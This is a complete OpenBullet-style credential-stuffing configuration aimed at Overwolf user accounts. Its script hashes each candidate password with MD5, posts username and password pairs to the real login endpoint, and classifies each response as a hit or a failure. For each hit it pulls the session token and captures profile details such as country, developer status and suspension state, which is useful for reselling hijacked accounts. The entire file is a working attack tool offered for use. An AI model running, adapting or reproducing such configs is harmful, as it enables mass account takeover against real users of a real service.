[SETTINGS]
{
  "Name": "Overwolf",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-10-11T07:12:13.8332887+01:00",
  "AdditionalInfo": "",
  "Author": "Seliax",
  "Version": "1.4.1 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
FUNCTION Hash MD5 "<PASS>" -> VAR "MD5" 

REQUEST POST "https://accounts.overwolf.com/users/login" 
  CONTENT "{\"id\": \"<USER>\",\"password\": \"<MD5>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 OverwolfClient/0.135.0.24" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json" 
  HEADER "Host: accounts.overwolf.com" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "{\"message\":\"user-doesnt-exist\"}" 
    KEY "{\"message\":\"invalid-password\"}" 
  KEYCHAIN Success OR 
    KEY "{\"token\":\"" 

PARSE "<SOURCE>" LR "{\"token\":\"" "\"}" -> VAR "TR" 

REQUEST GET "https://accounts.overwolf.com/users/profile" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 OverwolfClient/0.135.0.24Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json" 
  HEADER "Host: accounts.overwolf.com" 
  HEADER "Authorization: Bearer <TR>" 

PARSE "<SOURCE>" LR "username\":\"" "\"" -> CAP "Username" 

PARSE "<SOURCE>" LR "\",\"country\":" "," -> CAP "Country" 

PARSE "<SOURCE>" LR "isDeveloper\":" "," -> CAP "isDeveloper" 

PARSE "<SOURCE>" LR ",\"unverified\":" "," -> CAP "Unverified" 

PARSE "<SOURCE>" LR "suspended\":" "," -> CAP "Suspend" 

PARSE "<SOURCE>" LR ",\"avatar\":\"" "\",\"" -> CAP "Avatar" 

